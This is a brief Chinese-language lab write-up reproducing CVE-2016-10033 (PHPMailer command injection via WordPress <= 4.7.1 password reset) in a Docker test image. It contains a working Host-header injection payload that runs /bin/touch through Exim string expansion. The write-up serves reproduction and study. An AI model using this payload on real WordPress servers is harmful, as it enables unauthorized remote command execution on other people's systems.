CVE-2016-10033 发表于 2019-05-07 CVE-2016-10033影响范围WordPress <= 4.7.1 PHPMailer < 5.2.18 ubuntu 安装docker1apt-get install docker docker-compose docker.io 拉取镜像到本地1$ docker pull medicean/vulapps:w_wordpress_6 启动环境1$ docker run -d -p 80:80 medicean/vulapps:w_wordpress_6 复现过程1http://yourip/wp-login.php?action=lostpassword 填入admin,提交,用burp抓包 把Host: 改为: 1aa(any -froot@localhost -be ${run{${substr{0}{1}{$spool_directory}}bin${substr{0}{1}{$spool_directory}}touch${substr{10}{1}{$tod_log}}${substr{0}{1}{$spool_directory}}tmp${substr{0}{1}{$spool_directory}}test.txt}} null) 回显: 查看生成的txt文件 参考先知